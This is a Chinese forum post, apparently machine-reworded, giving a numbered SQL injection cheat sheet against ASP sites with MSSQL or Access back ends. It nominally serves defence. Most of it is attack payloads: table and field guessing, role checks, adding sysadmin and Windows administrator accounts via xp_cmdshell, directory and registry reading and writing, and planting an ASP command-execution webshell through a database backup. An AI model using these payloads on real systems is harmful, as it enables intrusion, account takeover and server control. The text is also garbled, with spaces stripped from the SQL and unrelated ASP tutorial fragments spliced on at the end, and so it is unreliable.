ASP网页设计ASP罕见注进技能
由于ASP还是一种Script语言所没除了大量使用组件外,没有办法提高其工作效率。它必须面对即时编绎的时间考验,同时我们还不知其背后的组件会是一个什么样的状况;进修一下注进技能也何尝不是件功德,亲信知彼嘛。能够更无效的避免注进,让网站加倍平安1.判别是不是有注进;and1=1
;and1=2
2.开端判别是不是是mssql
;anduser>0
3.注进参数是字符
and[查询前提]and=
4.搜刮时没过滤参数的
and[查询前提]and%25=
5.判别数据库体系
;and(selectcount(*)fromsysobjects)>0mssql
;and(selectcount(*)frommsysobjects)>0access
6.猜数据库
;and(SelectCount(*)from[数据库名])>0
7.猜字段
;and(SelectCount(字段名)from数据库名)>0
8.猜字段中纪录长度
;and(selecttop1len(字段名)from数据库名)>0
9.(1)猜字段的ascii值(access)
;and(selecttop1asc(mid(字段名,1,1))from数据库名)>0
(2)猜字段的ascii值(mssql)
;and(selecttop1unicode(substring(字段名,1,1))from数据库名)>0
10.测试权限布局(mssql)
;and1=(SELECTIS_SRVROLEMEMBER(sysadmin));--
;and1=(SELECTIS_SRVROLEMEMBER(serveradmin));--
;and1=(SELECTIS_SRVROLEMEMBER(setupadmin));--
;and1=(SELECTIS_SRVROLEMEMBER(securityadmin));--
;and1=(SELECTIS_SRVROLEMEMBER(diskadmin));--
;and1=(SELECTIS_SRVROLEMEMBER(bulkadmin));--
;and1=(SELECTIS_MEMBER(db_owner));--
11.增加mssql和体系的帐户
;execmaster.dbo.sp_addloginusername;--
;execmaster.dbo.sp_passwordnull,username,password;--
;execmaster.dbo.sp_addsrvrolemembersysadminusername;--
;execmaster.dbo.xp_cmdshellnetuserusernamepassword/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add;--
;execmaster.dbo.xp_cmdshellnetuserusernamepassword/add;--
;execmaster.dbo.xp_cmdshellnetlocalgroupadministratorsusername/add;--
12.(1)遍历目次
;createtabledirs(pathsvarchar(100),idint)
;insertdirsexecmaster.dbo.xp_dirtreec:
;and(selecttop1pathsfromdirs)>0
;and(selecttop1pathsfromdirswherepathsnotin(上步失掉的paths))>)
(2)遍历目次
;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));--
;inserttempexecmaster.dbo.xp_availablemedia;--取得以后一切驱动器
;insertintotemp(id)execmaster.dbo.xp_subdirsc:;--取得子目次列表
;insertintotemp(id,num1)execmaster.dbo.xp_dirtreec:;--取得一切子目次的目次树布局
;insertintotemp(id)execmaster.dbo.xp_cmdshelltypec:webindex.asp;--检察文件的内容
13.mssql中的存储历程
xp_regenumvalues注册表根键,子键
;execxp_regenumvaluesHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionRun以多个纪录集体例前往一切键值
xp_regread根键,子键,键值名
;execxp_regreadHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,CommonFilesDir前往制订键的值
xp_regwrite根键,子键,值名,值范例,值
值范例有2种REG_SZ暗示字符型,REG_DWORD暗示整型
;execxp_regwriteHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,
TestValueName,reg_sz,hello写进注册表
xp_regdeletevalue根键,子键,值名
execxp_regdeletevalueHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName删除某个值
xp_regdeletekeyHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionTestkey删除键,包含该键下一切值
14.mssql的backup创立webshell
usemodel
createtablecmd(strimage);
insertintocmd(str)values(<%DimoScript%>);
backupdatabasemodeltodisk=c:l.asp;
15.mssql内置函数
;and(select@@version)>0取得Windows的版本号
;anduser_name()=dbo判别以后体系的毗连用户是否是sa
;and(selectuser_name())>0爆以后体系的毗连用户
;and(selectdb_name())>0失掉以后毗连的数据库
16.简便的webshell
usemodel
createtablecmd(strimage);
insertintocmd(str)values(<%=server.createobject("wscript.shell").exec("cmd.exe/c"&request("c")).stdout.readall%>);
backupdatabasemodeltodisk=g:wwwtestl.asp
源代码保护方面其实现在考虑得没那么多了..NET也可以反编译.ASP写得复杂的话别人能看得懂的话.他也有能力自己写了.这方面担心的倒不太多.纵观现在网上可以下载的那些所谓BBS还有什么网站等等的源代码 虽然ASP也有很多网络教程。但是这些都不系统。都是半路出家,只是从一个例子告诉你怎么用。不会深入讨论,更不会将没有出现在例子里的方法都一一列举出来。 Application:这个存储服务端的数据,如果不清除,会直到web应用程序结束才清除(例如重启站点) 兴趣爱好,那么你无须学编程,申请一个域名和空间,在网上下载一些免费开源的CMS系统,你不用改代码,只须熟悉它们的后台操作,像office一样简单方便,很快就能建一个站点,很多站长都是这样做的 掌握asp的特性而且一定要知道为什么。 那么,ASP.Net有哪些改进呢? 用户端的浏览器不需要提供任何别的支持,这样大提高了用户与服务器之间的交互的速度。 Response:从字面上讲是“响应”,因此这个是服务端向客户端发送东西的,例如Response.Write ASP也是这几种脚本语言中最简单易学的开发语言。但ASP也是这几种语言中唯一的一个不能很好支持跨平台的语言。 因为ASP脚本语言非常简单,因此其代码也简单易懂,结合HTML代码,可快速地完成网站的应用程序。
页:
[1]